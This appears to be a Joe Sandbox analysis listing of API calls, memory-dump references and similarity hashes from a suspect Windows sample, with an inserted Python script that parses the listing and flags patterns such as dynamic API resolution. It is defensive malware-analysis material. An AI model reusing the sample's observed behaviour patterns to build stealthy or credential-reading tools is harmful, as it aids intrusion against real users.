• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
• Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
• Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
• Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
• Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
• Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
• Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
• Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
• Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
• Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
• Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
APIs
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
• Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
• Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
• Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
• Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
• Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2154303073-0
                                                                                                                                                                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3150196962-0
                                                                                                                                                                                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$PointerRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3154509469-0
                                                                                                                                                                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4232544981-0
                                                                                                                                                                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
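The per-function blocks above follow a fixed layout (an "APIs" list of direct and "Part of subcall function" calls, then "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity" metadata). As an added example that is not part of the Joe Sandbox report or its tooling, the following Python parses that layout into records and applies a few of the editor's own heuristic API-combination flags (LoadLibrary plus GetProcAddress for dynamic import resolution, the GetPrivateProfile/WritePrivateProfile family for INI-backed state, GetFileTime plus CompareFileTime). The block layout is inferred from the listing; the flag labels and rules are assumptions of this example, not Joe Sandbox signatures. The sample input is an excerpt copied from the LoadLibrary/GetProcAddress and GetPrivateProfileIntW blocks above, with the Opcode/Instruction ID and snapshot lines omitted.

```python
"""Parse the per-function "APIs" / "Similarity" blocks of a Joe Sandbox
function listing and flag API combinations worth a second look.
Added example for this report page, not Joe Sandbox code: the block layout is
inferred from the listing and the flag rules are the editor's own heuristics."""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall
# function ADDR:"; some lines (memset, wcscpy, ...) carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*?)\s*$")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: "str | None"  # caller address on "Part of subcall function" lines

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)   # ApiCall objects, listing order
    fields: dict = field(default_factory=dict)  # Similarity / dump metadata

    def api_names(self, direct_only=False) -> set:
        return {c.name for c in self.calls if not (direct_only and c.subcall_of)}

def parse_listing(text: str) -> list:
    """Return one FunctionRecord per "APIs" block, in listing order."""
    records, cur, in_apis = [], None, False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur, in_apis = FunctionRecord(), True
            records.append(cur)
        elif cur is None:
            continue
        elif s in SECTION_HEADERS:
            in_apis = False
        elif in_apis and (m := API_LINE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
        elif not in_apis and (f := FIELD_LINE.match(line)):
            cur.fields[f["key"]] = f["val"]
    return records

# Heuristic API combinations (editor's assumption, not sandbox signatures).
PATTERNS = {
    "dynamic API resolution": lambda n: "GetProcAddress" in n
        and bool(n & {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExW"}),
    "INI-backed configuration": lambda n: any(
        x.startswith(("GetPrivateProfile", "WritePrivateProfile")) for x in n),
    "file timestamp comparison": lambda n: {"GetFileTime", "CompareFileTime"} <= n,
}

def flag_record(rec: FunctionRecord) -> list:
    return [label for label, test in PATTERNS.items() if test(rec.api_names())]

def summarize(records: list) -> list:
    """Per function: direct APIs, APIs reached only via subcalls, and flags."""
    return [{"api_string_id": r.fields.get("API String ID", ""),
             "direct": sorted(r.api_names(direct_only=True)),
             "via_subcalls": sorted(r.api_names() - r.api_names(direct_only=True)),
             "flags": flag_record(r)} for r in records]

# Constructed sample input: an excerpt copied from two blocks of the listing,
# with the Opcode/Instruction ID and snapshot lines omitted.
SAMPLE = """\
APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
"""

if __name__ == "__main__":
    for row in summarize(parse_listing(SAMPLE)):
        print(row)
```

Running it on the excerpt yields one row per function: the first with GetProcAddress as its only direct call and LoadLibraryW reached through subcall 0040A804 (flagged as dynamic API resolution), the second flagged for INI-backed configuration. Feed the whole listing to `parse_listing` to get the same view for every function in the dump; the "API String ID" field is kept per record so flagged functions can be matched back to the report.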
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
APIs
• WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
• Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
• Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
• Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
APIs
• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
• Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
• Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
• Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
• Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
• Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
• Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
• Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
APIs
• EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
• Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
• Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
• Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
• Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
• Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
• Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
• Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
• Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
• Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00445426
